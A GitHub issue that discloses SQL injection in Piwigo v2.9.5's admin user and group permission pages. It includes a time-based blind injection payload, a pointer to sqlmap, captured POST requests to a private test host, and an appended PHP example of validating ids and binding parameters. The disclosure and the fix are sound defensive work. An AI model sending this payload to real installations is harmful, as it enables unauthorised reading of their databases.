SQL injection in user/group permissions manager #1011

Closed
zongdeiqianxing opened this issue May 7, 2019 · 3 comments

Hi, I found two new vulnerabilities in admin/user_perm.php and admin/group_perm.php.

1:
Request http://xx.xx.xx.xx/admin.php?page=user_perm&user_id=1 (need to have a private album),
then move the album from the right to the left.
payload: 1 and if(ascii(substr(database(),1,1))>97,1,sleep(5)) or use 'sqlmap'

2:
Same as the first: request /admin.php?page=user_perm&user_id=1 (need to have a private album),
then move the album from the right to the left.
payload: 1 and if(ascii(substr(database(),1,1))>97,1,sleep(5)) or use 'sqlmap'

@zongdeiqianxing

```
POST /admin.php?page=group_perm&group_id=1 HTTP/1.1
Host: 10.150.10.186:30008
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://10.150.10.186:30008/admin.php?page=group_perm&group_id=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
Cookie: pwg_id=tnnrng7j58gsgjms5hcdu2ge35
Connection: close
Upgrade-Insecure-Requests: 1

cat_false%5B%5D=11&trueify=%C2%AB
```

```
POST /admin.php?page=user_perm&user_id=1 HTTP/1.1
Host: 10.150.10.186:30008
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://10.150.10.186:30008/admin.php?page=user_perm&user_id=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 86
Cookie: pwg_id=bv8q0gb8mbcqb99bhcqdlf1q20
Connection: close
Upgrade-Insecure-Requests: 1

cat_false%5B%5D=1&trueify=%C2%AB
```

plegall added this to the 2.9.6 milestone May 31, 2019
plegall self-assigned this Aug 12, 2019
plegall modified the milestones: 2.9.6, 2.10.0RC1 Aug 12, 2019
plegall changed the title from "Piwigo v2.9.5 - SQL injection in admin/user_perm.php and admin/group_perm.php" to "SQL injection in user/group permissions manager" Aug 12, 2019

plegall commented Aug 12, 2019

vulnerability found in Piwigo v2.9.5
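
Added example, not part of the issue thread and not Piwigo's code: one way a handler could accept an array parameter such as `cat_false[]` only when every element is a plain numeric id, and then bind the values instead of concatenating them into the statement. The function names, the `album_access` table and its columns are hypothetical, and the example assumes the ids end up in an `IN (...)` list.

```php
<?php
// Added example; validated_ids(), in_placeholders(), album_access and its
// columns are hypothetical names, not Piwigo identifiers.

/** Return the submitted ids as ints; throw if any element is not a decimal id. */
function validated_ids($raw): array
{
    if (!is_array($raw) || $raw === []) {
        throw new InvalidArgumentException('expected a non-empty array of ids');
    }
    $ids = [];
    foreach ($raw as $value) {
        // ctype_digit() accepts only non-empty strings of 0-9, so spaces,
        // signs, quotes and SQL keywords all fail. The length cap keeps the
        // (int) cast from saturating on absurdly long digit strings.
        if (!is_string($value) || !ctype_digit($value) || strlen($value) > 9) {
            throw new InvalidArgumentException('id is not a plain integer');
        }
        $ids[] = (int) $value;
    }
    return array_values(array_unique($ids));
}

/** One "?" per id, so values are bound and never spliced into the SQL text. */
function in_placeholders(array $ids): string
{
    return implode(',', array_fill(0, count($ids), '?'));
}

// Constructed inputs: one normal submission, and one carrying the string
// quoted in the report in place of an album id.
$submissions = [
    'normal'   => ['11', '12'],
    'tampered' => ['1 and if(ascii(substr(database(),1,1))>97,1,sleep(5))'],
];

foreach ($submissions as $label => $cat_false) {
    try {
        $ids = validated_ids($cat_false);
        $sql = 'SELECT cat_id FROM album_access WHERE user_id = ? AND cat_id IN ('
             . in_placeholders($ids) . ')';
        // With PDO: $pdo->prepare($sql)->execute(array_merge([$userId], $ids));
        echo "$label: $sql with ", json_encode($ids), "\n";
    } catch (InvalidArgumentException $e) {
        echo "$label: rejected, ", $e->getMessage(), "\n";
    }
}
```

The same check applies to the `user_id` and `group_id` query-string values, since any id that reaches a statement unvalidated has the same exposure.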
